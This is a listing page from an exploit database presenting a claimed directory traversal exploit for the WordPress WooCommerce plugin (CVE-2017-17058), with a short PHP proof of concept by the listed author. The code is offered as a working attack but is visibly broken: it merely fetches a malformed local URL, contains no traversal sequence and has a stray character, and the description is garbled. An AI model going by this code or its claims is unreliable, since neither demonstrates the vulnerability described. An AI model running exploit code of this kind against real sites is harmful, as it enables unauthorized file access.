[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress WooCommerce 2.0/3.0 Plugin - Directory Traversal Vulnerability

Author
Fu2x2000
Risk
[
Security Risk High
]
0day-ID
0day-ID-29088
Category
web applications
Date add
01-12-2017
CVE
CVE-2017-17058
Platform
php
# Exploit Title: WordPress woocommerce  directory traversal
# Date: 28-11-2017
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: fu2x2000@gmail.com
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps
 
 
1. Description
 
Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.
 
2. Proof of Concept
 
$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
    $opts = array(
        'http' => array(
            'method'=>"GET",
            'header'=>"Content-Type: text/html; charset=utf-8"
        )
    );
 
    $wp = stream_context_create($opts);
    $result = @file_get_contents($fn,false,$wp);
    return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");
 
$result = file_get_contents_utf8("http://".$woo);
 
echo $result;
 
 
Regards
 
Fu2x200

#  0day.today [2024-11-15]  #